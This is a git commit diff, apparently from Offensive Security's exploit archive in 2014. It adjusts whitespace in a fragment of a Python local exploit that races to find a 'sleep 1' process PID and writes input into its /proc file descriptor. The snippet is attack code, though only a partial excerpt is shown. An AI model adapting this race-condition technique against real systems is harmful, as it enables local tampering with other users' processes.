Updated 08_08_2014

This commit is contained in:
Offensive Security 2014-08-08 04:40:42 +00:00
parent 40b9adcb14
commit 8687f3ea70

View file

@ -14,7 +14,7 @@ while (i == 0):
pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
if (pid == 0): #need an active pid, race condition applies
print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
return
return
else:
print "[+] PID: " + pid
loc = "echo n > /proc/" + pid + "/fd/1"